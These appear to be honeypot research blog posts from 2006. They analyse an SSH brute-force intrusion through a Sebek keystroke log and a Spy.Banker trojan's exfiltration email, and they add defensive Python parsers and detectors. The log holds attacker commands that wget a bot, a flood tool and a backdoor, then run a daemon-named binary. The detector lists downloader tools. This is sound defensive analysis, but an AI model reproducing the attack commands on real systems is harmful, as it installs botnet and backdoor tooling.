Honeypot Compromise: SSH Bruteforcing

Monday, October 30. 2006
About one month ago we had another compromise of one of our honeypots. The attacker came from the IP 71.116.213.XXX (static-71-116-213-XXX.lsanca.dsl-w.verizon.net), which is located in California, US (according to MaxMind). Later on he also used an IP located in Romania.

The compromise was not very interesting: the attacker used a tool for SSH bruteforcing and was able to guess the weak password of one user. He then installed an IRC bot and a backdoor on the compromised machine. Please find below the sanitized logging output of Sebek:

12:12:48 w
12:12:50 uname -a
12:12:54 passwd
12:12:43 w
12:12:53 ls
12:12:54 cd /tmp
12:12:55 ls
12:12:57 cd /var/tmp
12:12:57 ls
12:12:08 wget http://www.members.lycos.co.uk/XXX/mech.tar
12:12:15 wget http://free.7host06.com/XXX/linuxteam.tar.gz
12:12:29 wget http://free.7host06.com/XXX/flood
12:12:00 ls
12:12:04 tar zxvf mech.tar
12:12:06 cd mech
12:12:06 ls
12:12:10 pico mech1.users
12:12:12 nano mech1.users
12:12:16 mcedit mech1.users
12:12:19 vi mech1.users
[...]
12:12:07 vi kswap.set
[...]
12:12:28 ./inetd
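A defender reading a capture like this wants the pattern, rather than any single command, to raise the alarm: move into a world-writable directory, fetch archives from the web, unpack them, edit a bot configuration, then execute a binary named after a system daemon. The Python script below is an added example, not Sebek's or the Honeynet Project's own code. It parses Sebek-style `HH:MM:SS command` lines and scores a session against that chain; the two sample sessions and the host `example.invalid` are constructed for the example.

```python
import re

# Constructed sample in Sebek's "HH:MM:SS command" keystroke layout, modelled
# on the session above; the URL host and file names are placeholders.
SAMPLE_SESSION = """\
12:12:48 w
12:12:50 uname -a
12:12:57 cd /var/tmp
12:13:08 wget http://example.invalid/XXX/mech.tar
12:13:15 wget http://example.invalid/XXX/flood
12:13:24 tar zxvf mech.tar
12:13:26 cd mech
12:13:39 vi mech1.users
12:14:28 ./inetd
"""

# Constructed administrative session that must not trigger the chain.
BENIGN_SESSION = """\
09:01:02 w
09:01:10 cd /var/log
09:01:12 tail -n 50 auth.log
09:01:40 vi /etc/ssh/sshd_config
"""

LINE_RE = re.compile(r"^(\d{2}:\d{2}:\d{2})\s+(.*)$")
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
DOWNLOADERS = {"wget", "curl", "ftp", "lynx", "fetch"}
UNPACKERS = {"tar", "unzip", "gunzip", "bunzip2"}
EDITORS = {"vi", "vim", "nano", "pico", "mcedit", "ee"}
RECON = {"w", "who", "uname", "id", "ps"}
# Names a dropped binary commonly borrows so it blends in with real daemons in `ps`.
DAEMON_LOOKALIKES = {"inetd", "kswapd", "sshd", "crond", "httpd", "init"}

# The order in which the stages must appear for the session to count as a drop-and-run.
CHAIN = ("staging", "download", "unpack", "execute")


def parse_keystrokes(text):
    """Turn Sebek-style lines into (timestamp, command) pairs; noise such as '[...]' is skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries


def classify(cmd):
    """Map one command to a post-compromise stage, or None if it is unremarkable on its own."""
    argv = cmd.split()
    if not argv:
        return None
    prog = argv[0]
    if prog == "cd" and len(argv) > 1 and argv[1].startswith(STAGING_DIRS):
        return "staging"
    if prog in DOWNLOADERS:
        return "download"
    if prog in UNPACKERS:
        return "unpack"
    if prog in EDITORS:
        return "configure"
    if prog.startswith("./"):
        # A binary run from the working directory; note whether it mimics a daemon name.
        return "masquerade" if prog[2:] in DAEMON_LOOKALIKES else "execute"
    if prog in RECON:
        return "recon"
    return None


def analyze_session(text):
    """Score a keystroke log: how far the chain progressed, and which commands contributed."""
    indicators = []
    progress = 0
    for ts, cmd in parse_keystrokes(text):
        stage = classify(cmd)
        if stage is None:
            continue
        indicators.append((ts, stage, cmd))
        effective = "execute" if stage == "masquerade" else stage
        if progress < len(CHAIN) and effective == CHAIN[progress]:
            progress += 1
    return {
        "chain_complete": progress == len(CHAIN),
        "stages_reached": progress,
        "indicators": indicators,
        "masquerading_binaries": [cmd for _, s, cmd in indicators if s == "masquerade"],
    }


if __name__ == "__main__":
    for name, log in (("intrusion", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        r = analyze_session(log)
        print(name, "chain_complete =", r["chain_complete"], "stages =", r["stages_reached"])
```

The point of scoring the ordered chain rather than individual commands is false-positive control: `vi`, `tar` and `wget` are everyday administrator tools, and only their sequence inside a staging directory, finished by running `./inetd` from a user-unpacked archive, separates this session from routine maintenance.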

New contributor: David Watson

Monday, October 30. 2006
In the future, I will not be the only one who blogs on honeyblog.org. David Watson from the UK Honeynet Project will join me and blog about stories related to honeypots and honeynets.

SecurityFocus: "Viruses, Phishing, and Trojans For Profit"

Thursday, October 26. 2006
Kelly Martin from SecurityFocus published a nice article regarding the economic aspects of the underground: "Viruses, Phishing, and Trojans For Profit" is definitely an interesting read with links to many other articles. And I'm now off to start my YouTube :-)

Nepenthes and CWSandbox

Monday, October 23. 2006
It is also possible to use nepenthes together with CWSandbox: in the file submit-norman.cpp, change the line that sets the CURLOPT_URL option (line 174) from "http://sandbox.norman.no/live_4.html" to "http://luigi.informatik.uni-mannheim.de/submit.php?action=verify". All files are then sent to CWSandbox and you will receive the reports in your inbox.

The latest SVN version of nepenthes is able to submit binaries to Norman and CWSandbox, just take a look at changeset 674.

CWSandbox vs. Spy.Banker

Friday, October 20. 2006
From time to time we also get malware binaries that behave like a Trojan. This is an example of a Spy.Banker (named by ClamAV), which tries to steal confidential financial information from the compromised machines. The malware uses SMTP to send information back to the attacker. The following mail is sent to the attacker and contains information about the compromised machine:

From: "!Mensagem [Cartao]!" 
Subject: FOO [Infectado por fataL]
To: xtinfecs@gmail.com
Date: Thu, 5 Oct 2006 01:15:26 +0200
X-Priority: 1
X-Library: Indy 9.00.10

!============fataL CorP============!
!Maquina?: FOO!
!Vítima LOGADA: !
!IP: 123.456.789.abc!
!Data de Abertura: 05.10.2006 Hora de Abertura: 01:15:24_
!Sistema?: Microsoft Windows XP (version 5.1)!
!Endereço da Placa: 00-AB-CD-EF-GH-00!
!============fataL CorP============!


The sandbox can also extract this kind of information since it parses the winsock communication and tries to extract information about different protocols. In addition to SMTP, CWSandbox is currently also capable of understanding IRC, HTTP, and FTP. The complete report is also available as HTML analysis and XML analysis.
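What the sandbox does here, reconstructing the SMTP transaction from the winsock calls and pulling out the envelope, the headers and the exfiltrated fields, can be shown with a small parser. The Python below is an added example, not CWSandbox code. It replays a constructed client/server exchange written in the same `!Key: value!` layout as the mail above (the hosts, addresses, IP and MAC are documentation placeholders, not values from the capture) and then labels the body fields that fingerprint the victim by their value shape, so the Portuguese key names need not be known in advance.

```python
import re
from email.parser import Parser

# Constructed SMTP session in the layout of the Spy.Banker mail above.
# Hosts, addresses, IP and MAC are documentation placeholders, not the capture.
SESSION = [
    ("S", "220 mail.example.invalid ESMTP"),
    ("C", "EHLO VICTIM01"),
    ("S", "250 mail.example.invalid"),
    ("C", "MAIL FROM:<bot@example.invalid>"),
    ("S", "250 OK"),
    ("C", "RCPT TO:<dropbox@example.invalid>"),
    ("S", "250 OK"),
    ("C", "DATA"),
    ("S", "354 End data with <CR><LF>.<CR><LF>"),
    ("C", 'From: "!Mensagem [Cartao]!" <bot@example.invalid>'),
    ("C", "Subject: VICTIM01 [Infectado por fataL]"),
    ("C", "To: dropbox@example.invalid"),
    ("C", "X-Priority: 1"),
    ("C", "X-Library: Indy 9.00.10"),
    ("C", ""),
    ("C", "!============fataL CorP============!"),
    ("C", "!Maquina?: VICTIM01!"),
    ("C", "!IP: 192.0.2.10!"),
    ("C", "!Sistema?: Microsoft Windows XP (version 5.1)!"),
    ("C", "!Endereço da Placa: 00-00-5E-00-53-01!"),
    ("C", "!============fataL CorP============!"),
    ("C", "."),
    ("S", "250 OK queued"),
    ("C", "QUIT"),
]

ENVELOPE_RE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<?([^>\s]*)>?", re.I)
# "!Key?: value!" body lines; the optional "?" after the key follows the sample's style.
FIELD_RE = re.compile(r"^!([^:!]+?)\??:\s*(.*?)!?$")
# Headers whose value identifies the mail component the sample was built with.
LIBRARY_HEADERS = ("X-Library", "X-Mailer", "User-Agent")
# Value shapes that fingerprint the victim, independent of the (localized) key names.
VALUE_KINDS = (
    ("ipv4", re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")),
    ("mac", re.compile(r"^([0-9A-Fa-f]{2}[-:]){5}[0-9A-Fa-f]{2}$")),
    ("os", re.compile(r"windows|linux", re.I)),
)


def extract_smtp(session):
    """Replay the client side of an SMTP exchange; return envelope, key headers and body fields."""
    mail_from, rcpt_to, message, in_data = None, [], [], False
    for side, line in session:
        if side != "C":
            continue
        if in_data:
            if line == ".":
                in_data = False
            else:
                # Undo SMTP dot-stuffing: a body line starting with "." is sent as "..".
                message.append(line[1:] if line.startswith("..") else line)
            continue
        m = ENVELOPE_RE.match(line)
        if m:
            if m.group(1).upper() == "MAIL FROM":
                mail_from = m.group(2)
            else:
                rcpt_to.append(m.group(2))
        elif line.upper() == "DATA":
            in_data = True
    msg = Parser().parsestr("\n".join(message))
    fields = {}
    for body_line in msg.get_payload().splitlines():
        f = FIELD_RE.match(body_line.strip())
        if f:
            fields[f.group(1).strip()] = f.group(2).strip()
    library = next((msg[h] for h in LIBRARY_HEADERS if msg[h]), None)
    return {
        "envelope": {"mail_from": mail_from, "rcpt_to": rcpt_to},
        "headers": {k: msg[k] for k in ("From", "To", "Subject")},
        "library": library,
        "fields": fields,
    }


def classify_fields(fields):
    """Label body fields whose values look like an IP, a MAC address or an OS string."""
    out = {}
    for key, value in fields.items():
        for kind, rx in VALUE_KINDS:
            if rx.search(value):
                out[key] = kind
                break
    return out


if __name__ == "__main__":
    result = extract_smtp(SESSION)
    print(result["envelope"], result["library"])
    print(classify_fields(result["fields"]))
```

Two details carry over to real triage. The envelope recipient, not the `To:` header, is where the stolen data actually goes, which is why the parser records both. And the `X-Library: Indy 9.00.10` header is the stamp of the Indy networking components for Delphi/C++Builder, a cheap build-toolchain clue that a protocol-aware sandbox can surface without ever disassembling the sample.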